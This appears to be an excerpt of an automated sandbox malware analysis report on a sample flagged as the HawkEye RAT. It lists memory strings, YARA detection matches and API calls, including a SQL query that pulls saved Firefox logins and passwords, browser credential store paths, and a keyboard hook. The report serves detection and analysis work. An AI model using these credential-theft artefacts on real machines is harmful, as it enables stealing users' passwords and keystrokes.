                Source: vbc.exe, 0000000D.00000002.332890748.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.332406171.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.332307194.00000000009EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.msn.com/http://www.google.com/ms-appx-web://microsoft.microsoftedge/ms-appx-web://microsoft.microsoftedge/assets/errorpages/dnserror.html?ErrorStatus=0x800C0005ms-appx-web://microsoft.microsoftedge/assets/errorpages/dnserror.htmlms-appx-web://microsoft.microsoftedge/assets/errorpages/dnserror.html?ErrorStatus=0x800C0005&DNSError=11001ms-appx-web://microsoft.microsoftedge/assets/errorpages/dnserror.html?ErrorStatus=0x800C0005&DNSError=10060https://login.live.com/me.srf?wa=wsignin1.0&wreply=https%3A%2F%2Fwww.microsoft.com&uaid=c5003367-537c-4bc6-f11c-743a85fd800b&partnerId=retailstore2https://login.live.com/me.srfhttps://login.live.com/me.srf?wa=wsignin1.0&wreply=https%3A%2F%2Fwww.microsoft.com&uaid=8dc8b1f5-b8c0-44ac-8df2-c841e5a6aeb1&partnerId=retailstore2https://www.microsoft.com/en-us/welcomeie11/welcomeie11https://www.microsoft.com/store/buy/cartcounthttp://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=truehttp://cookies.onetrust.mgr.consensu.org/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591 equals www.yahoo.com (Yahoo)
                Source: pjavpo.exe, 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: pjavpo.exe, 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/beauty|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/food|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/health|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/makers|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/movies|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/music|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/parents|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/politics|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/style|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/tech|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/travel|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/tv|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com|ntpproviders equals www.yahoo.com (Yahoo)
                Source: pjavpo.exe, vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: Yara match -- File source: 3.2.pjavpo.exe.20e0000.1.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.4965c92.9.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.0.pjavpo.exe.41b460.11.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.0.pjavpo.exe.415058.10.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.4996408.12.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.4a20000.16.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.0.pjavpo.exe.415058.10.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 3.2.pjavpo.exe.20e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.4990000.15.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.0.pjavpo.exe.400000.9.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.0.pjavpo.exe.41ce65.15.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.4a29c0d.17.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.0.pjavpo.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.41ce65.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.0.pjavpo.exe.41ce65.12.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.380b065.7.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.0.pjavpo.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.3803258.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.490fe2d.10.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.3803258.6.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.4a7fa72.18.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.0.pjavpo.exe.41b460.16.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.0.pjavpo.exe.415058.14.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.4a28208.19.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.415058.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.0.pjavpo.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 3.2.pjavpo.exe.20f1458.2.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 3.2.pjavpo.exe.20f1458.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 3.2.pjavpo.exe.20f9265.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.490e428.11.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.0.pjavpo.exe.415058.14.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.415058.3.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.0.pjavpo.exe.400000.13.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.49edc72.14.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.4997e0d.13.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.0.pjavpo.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.41b460.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.3809660.8.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.0.pjavpo.exe.400000.7.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 3.2.pjavpo.exe.20f7860.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.4990000.15.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 5.2.pjavpo.exe.2829258.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match -- File source: Process Memory Space: pjavpo.exe PID: 6660, type: MEMORYSTR
                Source: Yara match -- File source: Process Memory Space: pjavpo.exe PID: 6720, type: MEMORYSTR
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.cs -- .Net Code: HookKeyboard
                Source: C:\Users\user\Desktop\TGQfHfehsY.exe -- Code function: 1_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

                System Summary

                Source: 3.2.pjavpo.exe.20e0000.1.unpack, type: UNPACKEDPE -- Matched rule: Detects HawkEye RAT -- Author: Kevin Breen <kevin@techanarchy.net>
                Source: 3.2.pjavpo.exe.20e0000.1.unpack, type: UNPACKEDPE -- Matched rule: detect HawkEye in memory -- Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.4965c92.9.raw.unpack, type: UNPACKEDPE -- Matched rule: Detects HawkEye RAT -- Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.4965c92.9.raw.unpack, type: UNPACKEDPE -- Matched rule: detect HawkEye in memory -- Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.41b460.11.raw.unpack, type: UNPACKEDPE -- Matched rule: Detects HawkEye RAT -- Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.41b460.11.raw.unpack, type: UNPACKEDPE -- Matched rule: detect HawkEye in memory -- Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.415058.10.unpack, type: UNPACKEDPE -- Matched rule: Detects HawkEye RAT -- Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.415058.10.unpack, type: UNPACKEDPE -- Matched rule: detect HawkEye in memory -- Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.4996408.12.raw.unpack, type: UNPACKEDPE -- Matched rule: Detects HawkEye RAT -- Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.4996408.12.raw.unpack, type: UNPACKEDPE -- Matched rule: detect HawkEye in memory -- Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, type: UNPACKEDPE -- Matched rule: Detects HawkEye RAT -- Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, type: UNPACKEDPE -- Matched rule: detect HawkEye in memory -- Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.415058.10.raw.unpack, type: UNPACKEDPE -- Matched rule: Detects HawkEye RAT -- Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.415058.10.raw.unpack, type: UNPACKEDPE -- Matched rule: detect HawkEye in memory -- Author: JPCERT/CC Incident Response Group
                Source: 3.2.pjavpo.exe.20e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 3.2.pjavpo.exe.20e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.4990000.15.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.4990000.15.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.41ce65.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.41ce65.15.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.4a29c0d.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.4a29c0d.17.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.41ce65.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.41ce65.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.41ce65.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.41ce65.12.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.380b065.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.380b065.7.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.3803258.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.3803258.6.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.490fe2d.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.490fe2d.10.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.3803258.6.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.3803258.6.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.4a7fa72.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.4a7fa72.18.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.41b460.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.41b460.16.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.4a28208.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.4a28208.19.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.pjavpo.exe.20f1458.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 3.2.pjavpo.exe.20f1458.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.pjavpo.exe.20f1458.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 3.2.pjavpo.exe.20f1458.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.pjavpo.exe.20f9265.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 3.2.pjavpo.exe.20f9265.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.490e428.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.490e428.11.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.415058.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.415058.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.49edc72.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.49edc72.14.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.4997e0d.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.4997e0d.13.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.3809660.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.3809660.8.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.pjavpo.exe.20f7860.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 3.2.pjavpo.exe.20f7860.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.4990000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.4990000.15.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.2829258.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
